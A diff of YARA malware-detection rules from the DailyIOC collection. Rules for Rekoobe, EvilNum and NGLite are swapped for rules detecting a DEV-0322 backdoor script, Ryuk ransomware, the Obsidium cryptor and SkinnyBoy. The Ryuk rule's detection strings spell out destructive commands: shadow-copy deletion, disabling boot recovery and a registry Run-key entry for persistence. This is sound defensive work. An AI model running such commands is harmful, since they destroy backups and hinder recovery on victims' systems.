6f ?? 00 00 0a [0-1] 7e 2f 00 00 04 16 7e 32 00 00 04 7e 30 00 00 04 7e 31 00 00 04 60 28 ?? 00 00 06 26 2a } - $s2 = { 02 [0-5] 72 df 00 00 70 28 1b 00 00 } - $s3 = { 1f 1a 28 ?? 00 00 0a 0a 1f 1c 28 ?? 00 00 0a 0b 7e 21 00 00 04 06 72 ?? 0c 00 70 28 15 00 00 0a 6f 16 00 00 0a [2] ?? 00 } - $s4 = { 7e 4e 00 00 0a 0a [0-1] 72 [2] 00 70 73 ?? 00 00 06 0b [0-1] 07 72 [2] 00 70 6f ?? 00 00 06 [1-3] 8d 7f 00 00 01 25 16 1f 0a 9d 6f ?? 00 00 0a 1c 9a 0a [0-1] de ?? 07 2c ?? 07 6f 42 00 00 0a } - $s5 = { 7e 4e 00 00 0a 0a [0-1] 73 ?? 00 00 0a 0b [0-1] 07 72 ?? 14 00 70 6f ?? 00 00 0a [0-2] 6f ?? 00 00 0a 6f ?? 00 00 0a 6f ?? 00 00 0a [0-2] 6f ?? 00 00 0a 0a } + $s1 = { 57 ff 15 38 a0 45 00 be [2] 45 00 33 ff 56 57 68 01 00 1f 00 ff 15 34 a0 45 00 85 c0 75 2b 56 57 57 ff 15 30 a0 45 00 57 8b f0 e8 44 00 00 00 6a 01 e8 3d 00 00 00 59 59 e8 3f ff ff ff 56 ff 15 2c a0 45 00 } + $s2 = { 51 a1 34 52 47 00 33 c5 89 45 fc 56 8d 45 f8 50 6a 02 6a 00 68 [2] 45 00 68 02 00 00 80 ff 15 0c a0 45 00 8b 15 bc 50 47 00 8b ca 8d 71 01 8a 01 41 84 c0 75 f9 2b ce 8b 35 08 a0 45 00 8d 41 01 50 52 6a 07 6a 00 68 [2] 45 00 ff 75 f8 ff d6 6a 05 68 [2] 45 00 6a 07 6a 00 68 [2] 45 00 ff 75 f8 ff d6 ff 75 f8 ff 15 10 a0 45 00 8b 4d fc 33 cd 5e e8 [2] 02 00 } + $s3 = { 57 8d 85 f8 fe ff ff bb 04 01 00 00 50 53 ff 15 48 a0 45 00 8d bd f8 fe ff ff 4f 8a 47 01 47 84 c0 75 f8 be [2] 45 00 8d 85 f4 fd ff ff 53 50 33 db a5 53 a5 66 a5 a4 ff 15 74 a0 45 00 8b cb 8a 84 0d f4 fd ff ff 88 84 0d f0 fc ff ff 41 84 c0 75 ed 8d 85 f0 fc ff ff 6a 5c 50 e8 [2] 02 00 59 59 85 c0 74 02 88 18 53 68 80 00 00 00 6a 02 53 53 68 00 00 00 40 8d 85 f8 fe ff ff 50 ff 15 1c a0 45 00 8b f8 83 ff ff 0f 84 a7 00 00 00 b9 78 50 47 00 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 95 f4 fd ff ff 8d 72 01 8a 02 42 84 c0 75 f9 2b d6 8d b5 f8 fe ff ff 8d 5e 01 8a 06 46 84 c0 75 f9 2b f3 83 c1 14 8d 04 56 03 c1 e8 [2] 02 00 8b f4 8d 85 f8 fe ff ff 50 8d 85 f0 fc ff ff 50 8d 85 f4 fd ff ff 50 50 68 78 50 47 00 56 ff 15 a0 a1 45 00 8b ce 83 c4 18 8d 51 01 8a 01 41 84 c0 75 f9 33 db 8d 85 ec fc ff ff 53 50 2b ca 51 56 57 ff 15 88 a0 45 00 57 ff 15 7c a0 45 00 53 53 53 8d 85 f8 fe ff ff 50 68 [2] 45 00 53 ff 15 94 a1 45 00 8d a5 e0 fc ff ff 5f 5e 5b 8b } + $s4 = { 51 a1 34 52 47 00 33 c5 89 45 fc 56 68 [2] 46 00 68 [2] 46 00 68 [2] 46 00 6a 11 e8 c6 fb ff ff 8b f0 83 c4 10 85 f6 74 12 ff 75 0c 8b ce ff 75 08 ff 15 a8 a1 45 00 ff d6 eb 14 6a 00 ff 75 0c ff 75 08 ff 15 4c a1 45 00 50 e8 d6 00 00 00 8b 4d fc 33 cd 5e e8 [2] fe ff 8b e5 } + $s5 = { 8b ec 6a ff 68 [2] 45 00 64 a1 00 00 00 00 50 83 ec 44 a1 34 52 47 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b f1 8b 3d 04 a0 45 00 68 00 00 00 f0 6a 01 6a 00 6a 00 56 c7 06 00 00 00 00 ff d7 85 c0 75 60 ff 15 54 a0 45 00 6a 08 6a 01 6a 00 68 [2] 45 00 56 8b d8 ff d7 85 c0 75 46 6a 28 6a 01 50 68 [2] 45 00 56 ff d7 85 c0 75 35 53 ff 15 58 a0 45 00 68 [2] 45 00 8d 4d d8 e8 ?? 8a fd ff 8d 45 d8 c7 45 fc 00 00 00 00 50 8d 4d b0 e8 d3 00 00 00 68 [2] 47 00 8d 45 b0 50 e8 [2] 00 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 4d f0 33 cd e8 [2] 00 00 } condition: - uint16(0)==0x5A4D and filesize >25KB and all of ($s*) + uint16(0)==0x5A4D and filesize >100KB and 4 of ($s*) } -rule ARKBIRD_SOLG_MAL_ELF_Rekoobe_Nov_2021_1 : FILE +rule ARKBIRD_SOLG_UNK_DEV_0322_Jul_2021_1 : CVE_2021_35211 FILE { meta: - description = "Detect the Rekoobe rootkit" + description = "Detect the script used by DEV-0322 for create a new user after exploit the CVE-2021-35211" author = "Arkbird_SOLG" - id = "a5b200f1-cbb7-5106-8127-74abd3cde061" - date = "2021-11-10" - modified = "2021-11-11" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-10/MAL_ELF_Rekoobe_Nov_2021_1.yara#L1-L20" + id = "8d16eb7f-c137-5f23-8830-ce26dc6e4d52" + date = "2021-07-16" + modified = "2021-11-10" + reference = "https://www.cadosecurity.com/triage-analysis-of-serv-u-ftp-user-backdoor-deployed-by-cve-2021-35211/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-09/DEV_0322/UNK_DEV_0322_Jul_2021_1.yara#L1-L26" license_url = "N/A" - logic_hash = "bde3d1a3d2d2e9efd4b7c68f69dce40d5e0f01d41885481730d8a7fa67cbab7e" + logic_hash = "7d7f012053bff6217f0fe9087acbeba13f83cb2c3dbe9a4fe8e7e0e4551edefd" score = 75 - quality = 73 - tags = "FILE" - hash1 = "bf09a1a7896e05b18c033d2d62f70ea4cac85e2d72dbd8869e12b61571c0327e" - hash2 = "e1999a3e5a611312e16bb65bb5a880dfedbab8d4d2c0a5d3ed1ed926a3f63e94" + quality = 59 + tags = "CVE-2021-35211, FILE" + hash1 = "fb101d9980ba2e22dceac7367c670b4894eaae9a8cef9de98ed85499a3b014ea" + hash2 = "134a570f480536d04a056da99e58a3c982aa36f5b314f48a01420b66b759d35d" + hash3 = "8785f1049eed4f837e634bf61468e6db921368b61ef5c8b4afa03f44465bd3e0" tlp = "white" - adversary = "-" + adversary = "DEV-0322" strings: - $s1 = { 00 ?? 19 00 00 00 48 85 c0 [2-6] bf 0a 00 00 00 e8 [2] 01 00 ?? 24 00 00 00 48 85 c0 [2-6] c6 00 48 c6 40 05 49 c6 40 01 49 c6 40 06 4c c6 40 02 53 c6 40 07 45 c6 40 03 54 c6 40 08 3d c6 40 04 46 c6 40 09 00 48 89 c7 e8 [2] 00 00 48 8d 54 24 0c } - $s2 = "GETCONF_DIR" ascii - $s3 = "/var/run/nscd/so/dev/ptmx" ascii - $s4 = { 45 78 65 63 53 74 61 72 74 3d 2f 62 69 6e 2f 62 61 73 68 20 2d 63 20 2f 75 73 72 2f 62 69 6e 2f 62 69 6f 73 65 74 64 } - $s5 = { 48 89 df e8 [3] ff 31 f6 48 89 df e8 [3] ff 48 8d 58 01 48 } - $s6 = { 2f 76 61 72 2f 74 6d 70 00 2f 76 61 72 2f 70 72 6f 66 69 6c 65 } + $obj1 = { 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 27 53 63 72 69 70 74 69 6e 67 2e 46 69 6c 65 53 79 73 74 65 6d 4f 62 6a 65 63 74 27 29 } + $obj2 = { 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 } + $arg1 = { 2d 73 74 6f 70 65 6e 67 69 6e 65 } + $arg2 = { 2d 73 74 61 72 74 73 65 72 76 69 63 65 } + $s1 = { 3c 3c 2d 20 41 64 6d 69 6e 54 79 70 65 } + $s2 = { 43 55 73 65 72 50 61 73 73 77 6f 72 64 41 74 74 72 5c 72 5c 6e 50 61 73 73 77 6f 72 64 } + $s3 = { 3c 3c 2d 20 50 61 73 73 77 6f 72 64 43 68 61 6e 67 65 64 4f 6e 5c 72 5c 6e 43 52 68 69 6e 6f 55 69 6e 74 41 74 74 72 } + $s4 = { 3c 3c 2d 20 49 6e 63 6c 75 64 65 52 65 73 70 43 6f 64 65 73 49 6e 4d 73 67 46 69 6c 65 73 } condition: - uint32(0)==0x464C457F and filesize >100KB and 5 of ($s*) + filesize >1KB and filesize <15KB and all of ($obj*) and all of ($arg*) and 3 of ($s*) } -rule ARKBIRD_SOLG_APT_Evilnum_JS_Jul_2021_1 : FILE +rule ARKBIRD_SOLG_Ran_Ruyk_Oct_2020_1 : FILE { meta: - description = "Detect JS script used by EvilNum group" + description = "Detect RYUK ransomware (Sept_2020_V1)" author = "Arkbird_SOLG" - id = "08b410c4-4899-5280-9735-6b3017c7a813" - date = "2020-07-13" - modified = "2021-07-14" + id = "7ade43ef-cd31-5308-b5ab-71f04d27018b" + date = "2020-10-25" + modified = "2020-10-27" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-13/EvilNum/APT_EvilNum_JS_Jul_2021_1.yara#L1-L22" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-27/RYUK/Ran_Ruyk_Oct2020_1.yar#L1-L29" license_url = "N/A" - logic_hash = "0ace40e54f6dca078f17e7e157c7973642b83366ba792d2bcdc0d971f729fb68" + logic_hash = "b70eb2e5f58076ea8d4d1370649358acf68f3119cb2be6d5ef0a302bb3bf5d1e" score = 75 - quality = 69 + quality = 75 tags = "FILE" - hash1 = "8420577149bef1eb12387be3ea7c33f70272e457891dfe08fdb015ba7cd92c72" - hash2 = "c16824a585c9a77332fc16357b5e00fc110c00535480e9495c627f656bb60f24" - hash3 = "1061baf604aaa7ed5ba3026b9367de7b6c7f20e7e706d9e9b5308c45a64b2679" - tlp = "white" - adversary = "EvilNum" + hash1 = "bbbf38de4f40754f235441a8e6a4c8bdb9365dab7f5cfcdac77dbb4d6236360b" + hash2 = "cfe1678a7f2b949966d9a020faafb46662584f8a6ac4b72583a21fa858f2a2e8" + hash3 = "e8a0e80dfc520bf7e76c33a90ed6d286e8729e9defe6bb7da2f38bc2db33f399" strings: - $s1 = { 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 4d 53 58 6d 6c 32 2e 44 4f 4d 44 6f 63 75 6d 65 6e 74 22 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 42 61 73 65 36 34 44 61 74 61 22 29 3b } - $s2 = { 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 4d 53 58 6d 6c 32 2e 44 4f 4d 44 6f 63 75 6d 65 6e 74 22 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 42 61 73 65 36 34 44 61 74 61 22 29 3b } - $s3 = { 69 66 20 28 2d 31 20 21 3d 20 57 53 63 72 69 70 74 2e 53 63 72 69 70 74 46 75 6c 6c 4e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 [1-8] 28 22 } - $s4 = { 52 75 6e 28 [1-8] 30 2c 20 30 29 } - $s5 = { 7d 2c 20 ?? 20 3d 20 ?? 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2c 20 ?? 20 3d 20 ?? 2e 73 6c 69 63 65 28 31 2c 20 31 20 2b 20 ?? 29 2c 20 ?? 20 3d 20 ?? 2e 73 6c 69 63 65 28 31 20 2b 20 ?? 20 2b 20 34 29 2c 20 ?? 20 3d 20 5b 5d 2c } - $s6 = { 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 41 44 4f 44 42 2e 53 74 72 65 61 6d 22 29 3b } - $s7 = { 5b ?? 5d 20 3d 20 ?? 20 2b 20 22 2d 22 20 2b 20 ?? 20 2b 20 22 2d 22 20 2b 20 ?? 20 2b 20 22 54 22 20 2b 20 ?? 20 2b 20 22 3a 22 20 2b 20 ?? 20 2b 20 22 3a 22 20 2b 20 ?? 3b } + $c1 = "\" /TR \"C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,50) do start wordpad.exe /p " fullword ascii + $c2 = "cmd.exe /c \"bootstatuspolicy ignoreallfailures\"" fullword ascii + $c3 = "C:\\Windows\\System32\\cmd.exe" fullword ascii + $c4 = "cmd.exe /c \"WMIC.exe shadowcopy delete\"" fullword ascii + $c5 = "cmd.exe /c \"vssadmin.exe Delete Shadows /all /quiet\"" fullword ascii + $c6 = "cmd.exe /c \"bcdedit /set {default} recoveryenabled No & bcdedit /set {default}\"" fullword ascii + $r1 = "/C REG ADD \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"EV\" /t REG_SZ /d \"" fullword wide + $r2 = "/C REG DELETE \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"EV\" /f" fullword wide + $ref1 = "lsaas.exe" fullword wide + $ref2 = "Ncsrss.exe" fullword wide + $ref3 = "$WGetCurrentProcess" fullword ascii + $ref4 = "lan.exe" fullword wide + $ref5 = "explorer.exe" fullword wide + $ref6 = "Ws2_32.dll" fullword ascii + $p1 = "\\users\\Public\\sys" fullword wide + $p2 = "\\Documents and Settings\\Default User\\sys" fullword wide condition: - filesize >8KB and 6 of ($s*) + uint16(0)==0x5a4d and filesize >40KB and 4 of ($c*) and 1 of ($r*) and 4 of ($ref*) and 1 of ($p*) } -rule ARKBIRD_SOLG_APT_Evilnum_LNK_Jul_2021_1 : FILE +rule ARKBIRD_SOLG_Ran_Ruyk_Oct_2020_2 : FILE { meta: - description = "Detect LNK file used by EvilNum group" + description = "Detect RYUK ransomware (Sept_2020_V1 + V2)" author = "Arkbird_SOLG" - id = "9d570c02-606a-5bff-af7a-9b5ef1e6df90" - date = "2020-07-13" - modified = "2021-07-14" + id = "82ed6736-00e6-5a30-89cf-a2b86f2e1ba6" + date = "2020-10-25" + modified = "2020-10-28" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-13/EvilNum/APT_EvilNum_LNK_Jul_2021_1.yara#L1-L22" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-27/RYUK/Ran_Ruyk_Oct2020_2.yar#L1-L29" license_url = "N/A" - logic_hash = "d20aadfce6a0246f415f94a62edbf7fd48dcdcd9756a5a8d898a5459633b9350" + logic_hash = "a06d61b9363b732d17a2766b280951198a6adc226e284ab1d909cd98516cfb6f" score = 75 - quality = 75 + quality = 46 tags = "FILE" - hash1 = "b60ae30ba90f852f886bb4e9aaabe910add2b70278e3a88a3b7968f644e10554" - hash2 = "bc203f44b48c9136786891be153311c37ce74ceb7eb540d515032c152f5eb2fb" - hash3 = "fefc9dbb46bc02a2bdccbf3c581d270f6341562e050e5357484ecae7e1e702f3" - tlp = "white" - adversary = "EvilNum" + hash1 = "d0d7a8f588693b7cc967fb4069419125625eb7454ba553c0416f35fc95307cbe" + hash2 = "d7333223dcc1002aae04e25e31d8c297efa791a2c1e609d67ac6d9af338efbe8" + hash3 = "bbbf38de4f40754f235441a8e6a4c8bdb9365dab7f5cfcdac77dbb4d6236360b" + hash4 = "cfe1678a7f2b949966d9a020faafb46662584f8a6ac4b72583a21fa858f2a2e8" + hash5 = "e8a0e80dfc520bf7e76c33a90ed6d286e8729e9defe6bb7da2f38bc2db33f399" + hash6 = "5b1f242aee0eabd4dffea0fe5f08aba60abf7c8d1e4f7fc7357af7f20ccd0204" strings: - $s1 = "1-5-21-669817101-1001941732-3035937113-1000" fullword wide - $s2 = "*..\\..\\..\\..\\..\\..\\Windows\\System32\\cmd.exe" fullword wide - $s3 = "C:\\Windows\\System32\\cmd.exe" fullword wide - $s4 = "System32 (C:\\Windows)" fullword wide - $s5 = { 3d 00 25 00 74 00 6d 00 70 00 25 00 5c 00 74 00 65 00 73 00 74 00 2e 00 63 00 26 } - $s6 = { 3c 00 22 00 25 [5] 25 00 6d 00 64 00 22 00 26 00 6e 00 65 00 74 00 73 00 74 00 61 00 74 00 20 00 2d } - $s7 = { 43 00 3a 00 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 20 00 46 00 69 00 6c 00 65 00 73 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 4e 00 54 00 5c 00 41 00 63 00 63 00 65 00 73 00 73 00 6f 00 72 00 69 00 65 00 73 00 5c 00 77 00 6f 00 72 00 64 00 70 00 61 00 64 00 2e 00 65 00 78 00 65 } + $s1 = "Type Descriptor'" fullword ascii + $s2 = "Class Hierarchy Descriptor'" fullword ascii + $s3 = "GET:PV" fullword ascii + $s4 = "Base Class Descriptor at (" fullword ascii + $s5 = "Complete Object Locator'" fullword ascii + $s6 = "UINi\\cYIqwxAcV^GYCY^EgzUvSZcsRW" fullword ascii + $s7 = "FrystFsgcteIaui" fullword ascii + $s8 = "delete[]" fullword ascii + $s9 = "Picuovphv Bbsg!Es|rwojrarkkd Stryjfes x4.3" fullword ascii + $s10 = "FrystGfuvrozHctj" fullword ascii + $s11 = "FrystUfngasfCqovf{v" fullword ascii + $op1 = { 63 62 6d 75 6a 7a 6e 49 4d 54 50 78 75 70 78 59 6f 65 71 4f 57 48 4a 78 57 71 4c 50 55 78 4a 6e 68 4b 71 57 57 6d 49 75 6a 51 64 4f 50 74 70 63 76 61 42 72 75 5a 6a 4d 69 79 59 52 69 58 78 4a 63 6b 51 70 4b 75 47 52 5a 51 42 5a 5a 61 50 69 76 66 77 43 6c 45 5a 67 76 6e 49 6c 54 74 4b 46 4d 68 53 4a 42 4f 64 6a 69 46 44 4d 62 70 78 76 52 5a 69 61 74 69 71 5a 6e 75 67 5a 62 78 72 51 } + $op2 = { 23 71 59 72 51 6d 58 48 4a 77 65 55 53 76 68 79 4f 62 51 50 6d 44 44 52 44 6e 72 49 53 57 6c 72 56 4a 56 75 68 52 4e 4a 66 6b 50 6e 6b 72 65 68 73 6e 6b 68 54 4e 70 6a 56 7a 7a 64 61 44 6e 62 44 67 5a 54 62 4b 65 63 54 69 35 4f 71 20 64 24 2d } condition: - filesize >60KB and 6 of ($s*) + uint16(0)==0x5a4d and filesize >40KB and 6 of ($s*) and 1 of ($op*) } -rule ARKBIRD_SOLG_MAL_Nglite_Nov_2021_1 : FILE +rule ARKBIRD_SOLG_Mem_Cryptor_Obsidium_Oct_2020_1 : FILE { meta: - description = "Detect NGLite backdoor (version A)" + description = "Detect Obsidium cryptor by memory string" author = "Arkbird_SOLG" - id = "cf2845f3-1176-5197-9d05-f123b0f23c75" - date = "2021-11-09" - modified = "2021-11-09" - reference = "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-08/NGLite/MAL_NGLite_Nov_2021_1.yara#L1-L19" + id = "039c45f0-cc43-50ee-ae4e-a7e0e220dc04" + date = "2020-10-25" + modified = "2020-10-27" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-27/RYUK/Mem_Cryptor_Obsidium_Oct_2020_1.yar#L1-L15" license_url = "N/A" - logic_hash = "ebafc52da76b9a960ee3c2c99955fb5dcb4acff2b7a0d7fad714bfc17617331a" + logic_hash = "5f471064505d7ab634b6d52f66fa0a96682af2eb1dd41afe4449543253c6bbf7" score = 75 - quality = 75 + quality = 50 tags = "FILE" - hash1 = "7e4038e18b5104683d2a33650d8c02a6a89badf30ca9174576bf0aff08c03e72" - hash2 = "3da8d1bfb8192f43cf5d9247035aa4445381d2d26bed981662e3db34824c71fd" - tlp = "white" - adversary = "-" strings: - $s1 = { 48 8b 05 48 e7 90 00 48 8d 0d 99 4b 99 00 48 89 04 24 48 89 4c 24 08 48 c7 44 24 10 08 02 00 00 e8 82 21 00 00 48 8b 44 24 18 48 85 c0 74 33 48 3d 08 02 00 00 77 2b 48 8d 1d 69 4b 99 00 c6 04 03 5c 48 ff c0 48 89 05 4b 3f 99 00 e9 d6 fe ff ff 31 c0 e8 8f fc 02 00 ba 09 02 00 00 e8 b5 fc 02 00 48 8d 05 fe d5 55 00 48 89 04 24 48 c7 44 24 08 24 00 00 00 e8 cc 44 00 00 31 c0 e8 65 fc 02 00 90 e8 af d2 02 } - $s2 = { 48 83 ec 70 48 89 6c 24 68 48 8d 6c 24 68 48 c7 44 24 30 00 00 00 00 48 c7 44 24 28 00 00 00 00 48 8b 05 bf dc 90 00 48 89 04 24 48 c7 44 24 08 ff ff ff ff 48 8d 44 24 30 48 89 44 24 10 48 8d 44 24 28 48 89 44 24 18 e8 39 17 00 00 48 83 7c 24 20 00 74 35 31 c0 31 c9 eb 24 48 89 ca 48 89 c1 bb 01 00 00 00 48 d3 e3 48 23 5c 24 30 48 8d 72 01 48 85 db 48 0f 45 d6 48 ff c0 48 89 d1 48 83 f8 40 7c d6 48 85 c9 75 3e 0f 57 c0 0f 11 44 24 38 0f 11 44 24 48 0f 11 44 24 58 48 8b 05 23 dc 90 00 48 89 04 24 48 8d 44 24 38 48 89 44 24 08 e8 10 16 00 00 8b 44 24 58 89 44 24 78 48 8b 6c 24 68 48 83 c4 70 c3 89 4c 24 78 48 8b 6c 24 68 48 } - $s3 = { 48 8b 05 60 cc 90 00 48 89 04 24 0f 57 c0 0f 11 44 24 08 0f 11 44 24 18 e8 02 07 00 00 48 8b 44 24 28 48 8b 4c 24 40 48 89 81 10 03 00 00 48 85 c0 0f 84 80 00 00 00 48 8b 05 29 cc 90 00 48 89 04 24 0f 57 c0 0f 11 44 24 08 0f 11 44 24 18 e8 cb 06 00 00 48 8b 44 24 28 48 8b 4c 24 40 48 89 81 18 03 00 00 48 85 c0 74 0a 48 8b 6c 24 30 48 83 c4 38 c3 48 8d 05 ac e0 56 00 48 89 04 24 e8 1b b6 02 00 48 8b 05 e4 cb 90 00 48 8b 4c 24 40 48 8b 91 10 03 00 00 48 89 04 24 48 89 54 24 08 e8 5a 05 00 00 48 8b 44 24 40 48 c7 80 10 03 00 00 00 00 00 00 eb b3 48 8d 05 61 e0 56 00 48 89 04 24 e8 d8 b5 02 00 e9 6b ff ff ff 48 8b 6c 24 30 48 83 c4 38 } - $s4 = { 48 81 ec a0 00 00 00 48 89 ac 24 98 00 00 00 48 8d ac 24 98 00 00 00 48 c7 44 24 48 00 00 00 00 48 8b 05 8a c9 90 00 48 89 04 24 48 c7 44 24 08 ff ff ff ff 48 c7 44 24 10 fe ff ff ff 48 c7 44 24 18 ff ff ff ff 48 8d 44 24 48 48 89 44 24 20 0f 57 c0 0f 11 44 24 28 48 c7 44 24 38 02 00 00 00 e8 3b 05 00 00 65 48 8b 04 25 28 00 00 00 48 8b 80 00 00 00 00 48 8b 40 30 48 8b 4c 24 48 48 87 88 78 02 00 00 0f 57 c0 0f 11 44 24 68 0f 11 44 24 78 0f 11 84 24 88 00 00 00 48 8b 05 5f c8 90 00 48 89 04 24 48 8d 44 24 68 48 89 44 24 08 48 8d 44 24 68 48 89 44 24 10 48 c7 44 24 18 30 00 00 00 e8 59 03 00 00 48 83 7c 24 20 } - $s5 = { 48 8b 15 26 29 92 00 48 89 14 24 48 89 4c 24 08 48 89 44 24 10 48 c7 44 24 18 00 10 00 00 48 c7 44 24 20 04 00 00 00 e8 71 64 01 00 48 83 7c 24 28 00 40 0f 94 c6 48 8b 44 24 38 48 8b 4c 24 48 48 8b 54 24 68 48 8b 5c 24 40 e9 61 ff ff ff 48 8b 6c 24 50 48 83 c4 58 c3 48 8b 6c 24 50 48 83 c4 58 c3 e8 25 91 01 00 48 8d 05 e2 b8 56 00 48 89 04 24 48 c7 44 24 08 19 00 00 00 e8 bc 9a 01 00 48 8b 44 24 38 48 89 04 24 e8 be 97 01 00 48 8d 05 9a b1 56 00 48 89 04 24 48 c7 44 24 08 19 00 00 00 e8 95 9a 01 00 8b 44 24 34 48 89 04 24 e8 98 97 01 00 e8 73 93 01 00 e8 5e 91 01 00 48 8d } + $s1 = "Obsidium\\" fullword ascii + $s2 = "obsidium.dll" fullword ascii + $s3 = "Software\\Obsidium" fullword ascii + $s4 = "winmm.dll" fullword ascii + $s5 = "'license.key" fullword ascii condition: - uint16(0)==0x5a4d and filesize >40KB and 4 of ($s*) + uint16(0)==0x5a4d and filesize >40KB and 3 of ($s*) } -rule ARKBIRD_SOLG_MAL_Nglite_Nov_2021_2 : FILE +rule ARKBIRD_SOLG_MAL_Skinnyboy_Launcher_Jun_2021_1 : FILE { meta: - description = "Detect NGLite backdoor (version B)" + description = "Detect the Launcher of SkinnyBoy" author = "Arkbird_SOLG" - id = "e18f2891-366b-5cff-a17e-63523bfd9cee" - date = "2021-11-08" - modified = "2021-11-09" - reference = "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-08/NGLite/MAL_NGLite_Nov_2021_2.yara#L1-L19" + id = "4e69cba4-92ef-5ea5-95d8-b22ed77f515c" + date = "2021-06-05" + modified = "2021-06-06" + reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-06/APT28/MAL_SkinnyBoy_Launcher_Jun_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "4d44d208010ca17f47f597f7d9eb5ee39d91a2d9077218a173ef0015699dc296" + logic_hash = "4d5906832a1bc90552255ada1cc9e3c7cd3e14e4b0cb11b1bf2c11c57bca8ad8" score = 75 quality = 75 tags = "FILE" - hash1 = "3f868ac52916ebb6f6186ac20b20903f63bc8e9c460e2418f2b032a207d8f21d" - hash2 = "805b92787ca7833eef5e61e2df1310e4b6544955e812e60b5f834f904623fd9f" - tlp = "white" - adversary = "-" + hash1 = "2a652721243f29e82bdf57b565208c59937bbb6af4ab51e7b6ba7ed270ea6bce" + tlp = "White" + adversary = "APT28" strings: - $s1 = { 8b 05 64 ?? bf 00 8d 0d e0 ?? c6 00 89 04 24 89 4c 24 04 c7 44 24 08 08 02 00 00 e8 d0 1d 00 00 8b 44 24 0c 85 c0 74 2e 3d 08 02 00 00 77 27 8d 1d e0 ?? c6 00 c6 04 03 5c 40 89 05 24 ?? c6 00 e9 0b ff ff ff 31 c0 e8 44 9f 02 00 ba 09 02 00 00 e8 6a 9f 02 00 8d 05 ?? 7b 8a 00 89 04 24 c7 44 24 04 24 00 00 00 e8 a4 3b 00 00 31 c0 e8 1d 9f 02 00 90 e8 57 86 02 } - $s2 = { 83 ec 40 c7 44 24 18 00 00 00 00 c7 44 24 14 00 00 00 00 8b 05 70 ?? bf 00 89 04 24 c7 44 24 04 ff ff ff ff 8d 44 24 18 89 44 24 08 8d 44 24 14 89 44 24 0c e8 21 15 00 00 8b 44 24 10 85 c0 74 32 31 c0 31 c9 eb 03 40 89 d1 83 f8 20 7d 20 19 d2 89 cb 89 c1 bd 01 00 00 00 d3 e5 21 d5 23 6c 24 18 85 ed 74 05 8d 53 01 eb dc 89 da eb d8 85 c9 75 2d 8d 7c 24 1c 31 c0 e8 63 98 02 00 8b 0d 60 ?? bf 00 89 0c 24 8d 4c 24 1c 89 4c 24 04 e8 46 14 00 00 8b 4c 24 30 89 4c 24 44 83 c4 40 c3 89 4c 24 44 83 c4 40 c3 e8 4d 7d 02 00 e9 38 } - $s3 = { 0f b6 2c 13 95 80 f8 80 95 72 f0 c7 44 24 20 00 00 00 00 8b 0d 7c ?? bf 00 89 0c 24 89 44 24 04 8d 4c 24 20 89 4c 24 08 e8 77 0b 00 00 8b 44 24 0c 85 c0 75 4a c7 44 24 1c 00 00 00 00 8b 05 20 ?? bf 00 89 04 24 8b 44 24 24 89 44 24 04 8b 44 24 30 89 44 24 08 8b 44 24 34 89 44 24 0c 8d 44 24 1c 89 44 24 10 c7 44 24 14 00 00 00 00 e8 f1 0b 00 00 8b 44 24 1c 89 44 24 38 83 c4 28 c3 8b 44 24 24 89 04 24 8b 44 24 30 89 44 24 04 8b 44 24 34 89 44 24 08 e8 59 00 00 00 8b 44 24 } - $s4 = { 83 ec 50 c7 44 24 24 00 00 00 00 8b 05 88 ?? bf 00 89 04 24 c7 44 24 04 ff ff ff ff c7 44 24 08 fe ff ff ff c7 44 24 0c ff ff ff ff 8d 44 24 24 89 44 24 10 c7 44 24 14 00 00 00 00 c7 44 24 18 00 00 00 00 c7 44 24 1c 02 00 00 00 e8 09 04 00 00 64 8b 05 14 00 00 00 8b 80 00 00 00 00 8b 40 18 84 00 05 68 01 00 00 89 04 24 8b 44 24 24 89 44 24 04 e8 d2 86 fd ff 8d 7c 24 34 31 c0 e8 60 86 02 00 8b 05 30 ?? bf 